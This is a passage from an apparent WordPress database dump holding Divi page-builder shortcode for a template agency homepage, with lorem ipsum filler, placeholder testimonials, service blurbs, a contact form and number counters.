saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-02 21:24:56','2020-07-02 21:24:56','',134,'https://52.66.212.87/2020/07/02/134-revision-v1/',0,'revision','',0),(168,1,'2020-07-02 21:29:01','2020-07-02 21:29:01','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"28px||78px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" title_text=\"Desktop HD\" custom_margin=\"|auto|1px|auto||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"60px\" header_line_height=\"1.3em\" custom_margin=\"50px||40px|||\" animation_style=\"fade\" hover_enabled=\"0\" header_font_size_last_edited=\"off|desktop\" locked=\"off\" text_text_shadow_style=\"preset1\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\" box_shadow_style=\"preset2\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter 